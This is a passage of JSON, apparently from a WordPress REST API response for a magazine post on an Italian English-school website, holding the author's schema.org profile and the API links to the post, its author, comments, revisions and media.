School\u2122"},"image":{"@id":"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/MyEnglishSchool"]},{"@type":"Person","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44","name":"Daniele","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g","caption":"Daniele"},"url":"https:\/\/www.myes.school\/it\/magazine\/author\/daniele\/"}]}},"_links":{"self":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/13964","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/comments?post=13964"}],"version-history":[{"count":1,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/13964\/revisions"}],"predecessor-version":[{"id":97675,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/13964\/revisions\/97675"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/media\/93165"}],"wp:attachment":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/media?parent=13964"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/categories?post=13964"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/tags?post=13964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}